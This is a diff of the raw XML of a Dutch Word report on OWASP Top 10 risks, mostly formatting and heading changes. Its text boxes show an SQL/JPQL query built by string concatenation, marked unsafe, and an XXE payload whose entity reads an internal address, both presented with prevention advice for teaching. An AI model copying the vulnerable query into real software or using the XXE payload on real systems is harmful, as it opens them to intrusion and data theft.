-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="1D0FCD3B" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:36.25pt;margin-top:78.35pt;width:435.95pt;height:110.6pt;z-index:251663360;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
@@ -2327,7 +3496,7 @@
               </wp:inline>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="28FCCE35" id="Tekstvak 2" o:spid="_x0000_s1028" type="#_x0000_t202" style="width:436.5pt;height:40.8pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
@@ -2359,7 +3528,6 @@
                         <w:t xml:space="preserve"> = </w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -2367,7 +3535,6 @@
                         <w:t>session.createQuery</w:t>
                       </w:r>
                       <w:proofErr w:type="spellEnd"/>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -2446,11 +3613,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc40955734"/>
-      <w:r>
+      <w:bookmarkStart w:id="4" w:name="_Toc42011032"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2504,11 +3672,19 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc40955735"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc42011033"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
       <w:r>
         <w:t>Ik gebruik JPA. Ik ben veilig, toch?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2526,7 +3702,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="nl-NL"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -2897,23 +4072,31 @@
               </wp:inline>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="4F597DB2" id="_x0000_s1029" type="#_x0000_t202" style="width:430.85pt;height:116.8pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
                       </w:pPr>
+                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t>public List&lt;</w:t>
+                        <w:t>public</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> List&lt;</w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
                       <w:r>
@@ -2930,7 +4113,6 @@
                         <w:t xml:space="preserve">&gt; </w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -2942,14 +4124,7 @@
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t>(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">String </w:t>
+                        <w:t xml:space="preserve">(String </w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
                       <w:r>
@@ -2968,7 +4143,7 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -3019,26 +4194,12 @@
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t xml:space="preserve"> + "'</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t>";</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">        </w:t>
+                        <w:t xml:space="preserve"> + "'";        </w:t>
                       </w:r>
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -3072,7 +4233,6 @@
                         <w:t>em.createQuery</w:t>
                       </w:r>
                       <w:proofErr w:type="spellEnd"/>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -3080,6 +4240,7 @@
                         <w:t>(</w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
+                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -3110,7 +4271,7 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -3119,10 +4280,23 @@
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    return </w:t>
+                        <w:t xml:space="preserve">    </w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>return</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -3130,7 +4304,6 @@
                         <w:t>q.getResultList</w:t>
                       </w:r>
                       <w:proofErr w:type="spellEnd"/>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -3140,7 +4313,7 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -3149,49 +4322,43 @@
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">      </w:t>
+                        <w:t xml:space="preserve">      .</w:t>
                       </w:r>
                       <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t>.stream</w:t>
+                        <w:t>stream()</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="NoSpacing"/>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">      .</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>map(</w:t>
                       </w:r>
                       <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t>()</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">      </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t>.map</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:lang w:val="en-US"/>
-                        </w:rPr>
-                        <w:t>(this::</w:t>
+                        <w:t>this::</w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
                       <w:r>
@@ -3210,7 +4377,7 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                       </w:pPr>
                       <w:r>
                         <w:rPr>
@@ -3218,26 +4385,13 @@
                         </w:rPr>
                         <w:t xml:space="preserve">      </w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
-                        <w:t>.collect</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:t>(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellStart"/>
-                      <w:r>
-                        <w:t>Collectors.toList</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellEnd"/>
-                      <w:r>
-                        <w:t xml:space="preserve">());        </w:t>
+                        <w:t xml:space="preserve">.collect(Collectors.toList());        </w:t>
                       </w:r>
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                       </w:pPr>
                       <w:r>
                         <w:t>}</w:t>
@@ -3340,8 +4494,16 @@
                               <w:rPr>
                                 <w:lang w:val="en-US"/>
                               </w:rPr>
-                              <w:t xml:space="preserve"> //onveilig</w:t>
+                              <w:t xml:space="preserve"> //</w:t>
                             </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>onveilig</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
                           </w:p>
                           <w:p>
                             <w:pPr>
@@ -3415,7 +4577,7 @@
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="31D6CC0F" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:53.3pt;width:347.5pt;height:48.75pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
@@ -3423,7 +4585,7 @@
                     <w:p>
                       <w:pPr>
                         <w:rPr>
-                          <w:lang w:val="en-NL"/>
+                          <w:lang w:val="en-US"/>
                         </w:rPr>
                       </w:pPr>
                       <w:r>
@@ -3448,14 +4610,14 @@
                       </w:r>
                       <w:r>
                         <w:rPr>
-                          <w:lang w:val="en-NL"/>
+                          <w:lang w:val="en-US"/>
                         </w:rPr>
                         <w:t xml:space="preserve"> //</w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
                       <w:r>
                         <w:rPr>
-                          <w:lang w:val="en-NL"/>
+                          <w:lang w:val="en-US"/>
                         </w:rPr>
                         <w:t>onveilig</w:t>
                       </w:r>
@@ -3464,7 +4626,7 @@
                     <w:p>
                       <w:pPr>
                         <w:rPr>
-                          <w:lang w:val="en-NL"/>
+                          <w:lang w:val="en-US"/>
                         </w:rPr>
                       </w:pPr>
                       <w:r>
@@ -3503,14 +4665,14 @@
                       </w:r>
                       <w:r>
                         <w:rPr>
-                          <w:lang w:val="en-NL"/>
+                          <w:lang w:val="en-US"/>
                         </w:rPr>
                         <w:t xml:space="preserve"> //</w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
                       <w:r>
                         <w:rPr>
-                          <w:lang w:val="en-NL"/>
+                          <w:lang w:val="en-US"/>
                         </w:rPr>
                         <w:t>veilig</w:t>
                       </w:r>
@@ -3553,12 +4715,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc40955736"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc42011034"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Broken Authentication</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3569,11 +4731,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc40955737"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc42011035"/>
       <w:r>
         <w:t>Maar aan welke senarios kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3606,11 +4768,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc40955738"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc42011036"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3671,6 +4833,16 @@
       <w:r>
         <w:t>Gebruik een server-side, veilige, ingebouwde sessiebeheerder die na inloggen een nieuwe willekeurige sessie-ID met hoge entropie genereert. Sessie-ID's mogen niet in de URL staan, veilig worden opgeslagen en ongeldig worden gemaakt na uitloggen, inactiviteit en absolute time-outs.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc42011037"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3706,12 +4878,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc40955739"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc42011038"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Sensitive Data Exposure</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3722,11 +4894,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc40955740"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc42011039"/>
       <w:r>
         <w:t>Maar aan welke senarios kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3792,11 +4964,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc40955741"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc42011040"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3893,6 +5065,16 @@
       <w:r>
         <w:t>Controleer onafhankelijk de effectiviteit van configuratie en instellingen.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc42011041"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3932,12 +5114,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc40955742"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc42011042"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>XML External Entities (XXE)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3948,11 +5130,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc40955743"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc42011043"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4108,14 +5290,14 @@
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="0EA5B4DA" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:363.2pt;margin-top:17.9pt;width:414.4pt;height:110.6pt;z-index:251665408;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -4129,7 +5311,7 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -4143,7 +5325,7 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -4157,7 +5339,7 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
@@ -4185,36 +5367,10 @@
                     </w:p>
                     <w:p>
                       <w:pPr>
-                        <w:pStyle w:val="Geenafstand"/>
+                        <w:pStyle w:val="NoSpacing"/>
                       </w:pPr>
                       <w:r>
-                        <w:t>&lt;</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellStart"/>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:t>foo</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellEnd"/>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:t>&gt;&amp;</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellStart"/>
-                      <w:r>
-                        <w:t>xxe</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellEnd"/>
-                      <w:r>
-                        <w:t>;&lt;/</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellStart"/>
-                      <w:r>
-                        <w:t>foo</w:t>
-                      </w:r>
-                      <w:proofErr w:type="spellEnd"/>
-                      <w:r>
-                        <w:t>&gt;</w:t>
+                        <w:t>&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -4294,11 +5450,33 @@
                                 <w:lang w:val="en-US"/>
                               </w:rPr>
                             </w:pPr>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:lang w:val="en-US"/>
                               </w:rPr>
-                              <w:t>&lt;!ENTITY xxe SYSTEM "https://192.168.1.1/private" &gt;]&gt;</w:t>
+                              <w:t>&lt;!ENTITY</w:t>
+                            </w:r>
+                            <w:proofErr w:type="gramEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>xxe</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -4318,21 +5496,43 @@
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
